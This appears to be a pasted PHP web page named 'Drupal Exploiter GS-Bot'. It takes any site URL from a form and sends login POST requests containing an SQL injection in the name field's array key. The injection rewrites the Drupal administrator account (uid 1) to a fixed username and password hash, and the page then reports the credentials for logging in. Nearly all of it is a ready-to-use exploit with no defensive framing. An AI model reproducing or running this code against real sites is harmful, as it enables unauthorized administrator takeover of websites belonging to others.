SHOW:
|
|
- or go back to the newest paste.
| 1 | <!Doctype HTML> | |
| 2 | <html> | |
| 3 | <head> | |
| 4 | <title>Drupal Exploiter GS-Bot |CODED FALLAGASSRINI</title> | |
| 5 | <style type="text/css"> | |
| 6 | .mymargin{
| |
| 7 | margin-top:100px; | |
| 8 | color:white; | |
| 9 | font-family: monospace; | |
| 10 | } | |
| 11 | body{
| |
| 12 | background-color:black; | |
| 13 | } | |
| 14 | </style> | |
| 15 | </head> | |
| 16 | <body> | |
| 17 | <div class="mymargin"> | |
| 18 | <center> | |
| 19 | <form method="GET" action=""> | |
| 20 | Site : <input type="text" name="url" placeholder="Example: www.site.com"> | |
| 21 | <input type="submit" name="submit" value="submit"> | |
| 22 | </form> | |
| 23 | <br> | |
| 24 | <?php | |
| 25 | error_reporting(0); | |
| 26 | if(isset($_GET['submit'])){
| |
| 27 | ||
| 28 | $url = $_GET['url']; | |
| 29 | $post_data = "name[0;update users set name %3D 'gassrini' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "',status
| |
| 30 | %3D'1' where uid %3D '1';#]=FcUk&name[]=Crap&pass=test&form_build_id=&form_id=user_login&op=Log+in"; | |
| 31 | $params = array( | |
| 32 | 'http' => array( | |
| 33 | 'method' => 'POST', | |
| 34 | 'header' => "Content-Type: application/x-www-form-urlencoded\r\n", | |
| 35 | 'content' => $post_data | |
| 36 | ) | |
| 37 | ); | |
| 38 | $ctx = stream_context_create($params); | |
| 39 | $data = file_get_contents($url . '/user/login/', null, $ctx); | |
| 40 | echo "<h3>Testing at \"/user/login/</h3>\""; | |
| 41 | if((stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data)|| (stristr($data, 'FcUk Crap') && $data)) {
| |
| 42 | echo "Success! Log in with username \"gassrini\" and password \"admin\" at {$url}/user/login";
| |
| 43 | } else {
| |
| 44 | echo "Error! Either the website isn't vulnerable, or your Internet isn't working. "; | |
| 45 | } | |
| 46 | } | |
| 47 | ||
| 48 | if(isset($_GET['submit'])){
| |
| 49 | ||
| 50 | $url = "http://".$_GET['url']."/"; | |
| 51 | $post_data = "name[0;update users set name %3D 'gassrini' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "',status
| |
| 52 | %3D'1' where uid %3D '1';#]=test3&name[]=Crap&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in"; | |
| 53 | $params = array( | |
| 54 | 'http' => array( | |
| 55 | 'method' => 'POST', | |
| 56 | 'header' => "Content-Type: application/x-www-form-urlencoded\r\n", | |
| 57 | 'content' => $post_data | |
| 58 | ) | |
| 59 | ); | |
| 60 | $ctx = stream_context_create($params); | |
| 61 | $data = file_get_contents($url . '?q=node&destination=node', null, $ctx); | |
| 62 | echo "<h3>Testing at \"Index</h3>\""; | |
| 63 | if(stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) {
| |
| 64 | echo "Success! Log in with username \"gassrini\" and password \"admin\" at {$url}/user/login";
| |
| 65 | } else {
| |
| 66 | echo "Error! Either the website isn't vulnerable, or your Internet isn't working. "; | |
| 67 | } | |
| 68 | } | |
| 69 | ||
| 70 | ?> | |
| 71 | </div> | |
| 72 | ||
| 73 | </body> | |
| 74 | </html> |
